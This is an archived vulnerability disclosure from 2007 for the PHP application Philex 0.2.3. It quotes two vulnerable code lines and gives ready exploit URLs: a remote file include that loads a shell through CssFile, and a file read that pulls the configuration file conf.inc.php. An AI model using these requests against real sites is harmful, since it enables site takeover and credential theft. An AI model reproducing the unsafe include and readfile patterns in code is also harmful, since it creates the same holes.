Lucene search
SecurityvulnsSECURITYVULNS:DOC:16461HistoryMar 25, 2007 - 12:00 a.m.
Philex 0.2.3 <= Remote File(Disclosure/Include)Vulnerabilities
2007-03-2500:00:00
vulners.com
33
######################################################
Philex 0.2.3 <= Remote File(Disclosure/Include)Vulnerabilities
D.Script: http://kent.dl.sourceforge.net/sourceforge/philex/philex_0.2.3.tgz
Discovered by: GloD_M = [Mahmood_ali]
Homepage: http://www.Tryag.cc
Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group
######################################################
V.Code Include:
<?include $CssFile;?>
Exploit Remote File Include:
[Path_Philex]/header.inc.php?CssFile=Shell
######################################################
V.Code Disclosure:
readfile($HTTP_GET_VARS["file"]);
Exploit Remote File Disclosure:
[Path_Philex]/download.php?file=conf.inc.php
######################################################